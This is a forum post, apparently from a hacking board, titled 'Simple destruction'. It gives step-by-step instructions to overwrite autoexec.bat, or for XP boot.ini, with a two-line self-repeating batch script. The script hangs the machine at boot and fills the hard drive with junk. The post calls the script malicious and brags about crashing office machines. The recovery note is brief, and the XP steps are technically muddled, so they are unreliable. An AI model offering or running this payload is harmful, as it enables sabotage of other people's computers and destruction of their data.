Jump to content
GoodKat

Simple destruction

Recommended Posts

Credits : Phatbooster

How anyone can crash a Windows or MS-DOS computer?

Using the simplest of resources a three year old could crash one, and

now you can too. Here is how it is done:

==========================

Option 1 (for win98/win95/winNT)

Go to DOS or open Notepad in accessories

Open the autoexec.bat file in the C:\ directory

Copy these two lines into the file:


@cd>>x
@%0

Delete all other lines in the autoexec.bat

Save

==========================

Option 2 (for win xp)

+ Open –> Control Panel –> System –> Click the “Advance Tab” –>

click “settings” under “Startup and Recovery” and edit the

“Default Operating System”

+ Ninja copy/paste these two lines into the file:


@cd>>x
@%0

Delete all other lines in the boot.ini

Save

==========================

That’s it. No sweat! There is nothing else you have to do, this will fuck up the

machine indefinetly. Want to know how it works?

The @ symbol preceeding each command makes it so the command is not

displayed in DOS. cd>>x will copy the current directory into a file

called x. %0 repeats this command over and over again and lags the

computers processes. The file called x will eventually fill the hard

drive with useless data until nothing else will fit on the hard drive.

All you will see when you reboot the computer is this:

Starting MS-DOS…

The computer will most likely not respond to any commands after that.

The way to stop this program from destroying the computer is booting

with a system disk or holding the shift key on boot. When you’re in DOS

delete the lines from the autoexec.bat file so it won’t fuck it up.

Replace the original commands in the autoexe.bat and save it. Reboot.

This script written by Phatbooster is completely malicious,

I don’t recommend you try it on your own computer, it’s senseless

and insane. I got this idea a long time ago from a gurl named

Aresgada, it has been tried, tested, and

will work. If I wanted to, I could crash every machine running at my

opis, but that would be pointless. Don’t use this for anything dumb,

it’s more powerful than it looks, you have been warned.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...